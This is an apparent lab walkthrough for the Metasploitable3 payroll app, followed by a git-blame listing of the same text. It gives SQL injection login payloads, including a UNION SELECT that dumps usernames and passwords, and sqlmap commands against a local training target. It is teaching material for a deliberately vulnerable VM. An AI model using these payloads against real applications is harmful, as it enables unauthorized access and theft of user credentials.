metasploitable3-solutions/Payroll_App_SQL_Injection_Challenge.md

<b>For this tutorial you will need the following tools</b>

* Browser (Prefarably Mozilla)
* Burpsuite
* SQLMap

1. <b>Try and login using the following credentials:</b>

   | Field     | Value    |
   | --------- |:--------:|
   | USERNAME  | admin    |
   | PASSWORD  | admin    |  

RESULTS: The webpage will display your username and no content
 
   ![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/step-1.png "STEP 1")
   
   ![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/result-1.png "Result 1")
2. <b>Try and login using the following credentials:</b>

   | Field     | Value    |
   | --------- |:--------:|
   | USERNAME  | '        |
   | PASSWORD  | admin    |  

RESULTS: The webpage will be blank
   ![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/step-2.png "STEP 2")
   ![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/result-2.png "RESULT 2")
   
3. <b>Try and login using the following credentials:</b>

   | Field     | Value    |
   | --------- |:--------:|
   | USERNAME  | ' or 1;#'|
   | PASSWORD  | admin    |  

RESULTS: The web page will return all the user content
   ![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/step-3.png "STEP 2")
   ![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/result-3.png "RESULT 2")
4. <b>Use SQLMap to extract the database using the following commands:</b>

   ```
   sqlmap -u http://127.0.0.1:7000/payroll_app.php --data="user=admin&password=admin&s=OK" -p user --method POST
   ```

RESULTS: SQLMap will identify whether the web application is vulnerable to SQL Injection
   ![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/step-4-sqlmap.png "STEP 4")
   ![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/result-4-1.png "RESULT 4")
   
5. <b>Use SQLMap to extract the columns in the table</b>

   ```
   sqlmap -u http://127.0.0.1:7000/payroll_app.php --data="user=admin&password=admin&s=OK" -p user --method POST --columns
   ```

RESULTS: SQLMap will retrieve the columns on the application tables
   ![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/step-5-1.png "STEP 5")
   ![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/step-5-2.png "RESULT 5")   

6. <b>Use the column names to retrieve the user credentials:</b>

   | Field     | Value                                       |
   | --------- |:-------------------------------------------:|
   | USERNAME  | ' or 1 union select 1,username,password,1;#'|
   | PASSWORD  | admin                                       |  

RESULTS: The web page will return the user credentials
   ![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/step-6.png "STEP 5")
   ![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/result-6-1.png "RESULT 6")
   ![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/result-6-2.png "RESULT 6")  
   ![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/result-6-3.png "RESULT 6")
Update Payroll_App_Challenge.md 2019-06-13 07:40:03 +02:00			`<b>For this tutorial you will need the following tools</b>`
Update Payroll_App_Challenge.md 2019-06-13 07:23:43 +02:00
Update Payroll_App_Challenge.md 2019-06-13 07:15:28 +02:00			`* Browser (Prefarably Mozilla)`
			`* Burpsuite`
			`* SQLMap`
Create Payroll_App_Challenge.md 2019-06-13 07:05:40 +02:00
Update Payroll_App_Challenge.md 2019-06-13 07:40:03 +02:00			`1. <b>Try and login using the following credentials:</b>`
Update Payroll_App_Challenge.md 2019-06-13 07:21:17 +02:00
Update Payroll_App_Challenge.md 2019-06-13 07:22:20 +02:00			`\| Field \| Value \|`
			`\| --------- \|:--------:\|`
			`\| USERNAME \| admin \|`
			`\| PASSWORD \| admin \|`
Update Payroll_App_Challenge.md 2019-06-13 07:20:05 +02:00
Update Payroll_App_Challenge.md 2019-06-13 07:23:43 +02:00			`RESULTS: The webpage will display your username and no content`
Update Payroll_App_Challenge.md 2019-06-13 07:24:58 +02:00
Update Payroll_App_Challenge.md 2019-06-13 07:15:28 +02:00			`![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/step-1.png "STEP 1")`
Update Payroll_App_Challenge.md 2019-06-13 07:23:43 +02:00
Update Payroll_App_Challenge.md 2019-06-13 07:20:05 +02:00			`![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/result-1.png "Result 1")`
Update Payroll_App_Challenge.md 2019-06-13 07:28:04 +02:00			`2. <b>Try and login using the following credentials:</b>`
Update Payroll_App_Challenge.md 2019-06-13 07:23:43 +02:00
Update Payroll_App_Challenge.md 2019-06-13 07:22:20 +02:00			`\| Field \| Value \|`
			`\| --------- \|:--------:\|`
			`\| USERNAME \| ' \|`
			`\| PASSWORD \| admin \|`
Update Payroll_App_Challenge.md 2019-06-13 07:20:05 +02:00
Update Payroll_App_Challenge.md 2019-06-13 07:23:43 +02:00			`RESULTS: The webpage will be blank`
Update Payroll_App_Challenge.md 2019-06-13 07:20:05 +02:00			`![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/step-2.png "STEP 2")`
Update Payroll_App_Challenge.md 2019-06-13 07:25:50 +02:00			`![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/result-2.png "RESULT 2")`
Update Payroll_App_Challenge.md 2019-06-13 07:28:04 +02:00
Update Payroll_App_Challenge.md 2019-06-13 07:32:05 +02:00			`3. <b>Try and login using the following credentials:</b>`
Update Payroll_App_Challenge.md 2019-06-13 07:28:04 +02:00
			`\| Field \| Value \|`
			`\| --------- \|:--------:\|`
Update Payroll_App_Challenge.md 2019-06-13 07:28:48 +02:00			`\| USERNAME \| ' or 1;#'\|`
Update Payroll_App_Challenge.md 2019-06-13 07:28:04 +02:00			`\| PASSWORD \| admin \|`

			`RESULTS: The web page will return all the user content`
			`![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/step-3.png "STEP 2")`
			`![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/result-3.png "RESULT 2")`
Update Payroll_App_Challenge.md 2019-06-13 07:32:05 +02:00			`4. <b>Use SQLMap to extract the database using the following commands:</b>`

Update Payroll_App_Challenge.md 2019-06-13 07:34:06 +02:00			```
			`sqlmap -u http://127.0.0.1:7000/payroll_app.php --data="user=admin&password=admin&s=OK" -p user --method POST`
			```
Update Payroll_App_Challenge.md 2019-06-13 07:32:05 +02:00
			`RESULTS: SQLMap will identify whether the web application is vulnerable to SQL Injection`
			`![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/step-4-sqlmap.png "STEP 4")`
			`![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/result-4-1.png "RESULT 4")`
Update Payroll_App_Challenge.md 2019-06-13 07:34:06 +02:00
			`5. <b>Use SQLMap to extract the columns in the table</b>`

			```
			`sqlmap -u http://127.0.0.1:7000/payroll_app.php --data="user=admin&password=admin&s=OK" -p user --method POST --columns`
			```

Update Payroll_App_Challenge.md 2019-06-13 07:39:09 +02:00			`RESULTS: SQLMap will retrieve the columns on the application tables`
Update Payroll_App_Challenge.md 2019-06-13 07:34:06 +02:00			`![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/step-5-1.png "STEP 5")`
			`![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/step-5-2.png "RESULT 5")`
Update Payroll_App_Challenge.md 2019-06-13 07:39:09 +02:00
Update Payroll_App_Challenge.md 2019-06-13 07:41:08 +02:00			`6. <b>Use the column names to retrieve the user credentials:</b>`
Update Payroll_App_Challenge.md 2019-06-13 07:39:09 +02:00
			`\| Field \| Value \|`
			`\| --------- \|:-------------------------------------------:\|`
			`\| USERNAME \| ' or 1 union select 1,username,password,1;#'\|`
			`\| PASSWORD \| admin \|`

			`RESULTS: The web page will return the user credentials`
			`![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/step-6.png "STEP 5")`
			`![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/result-6-1.png "RESULT 6")`
			`![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/result-6-2.png "RESULT 6")`
			`![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/payroll_app/result-6-3.png "RESULT 6")`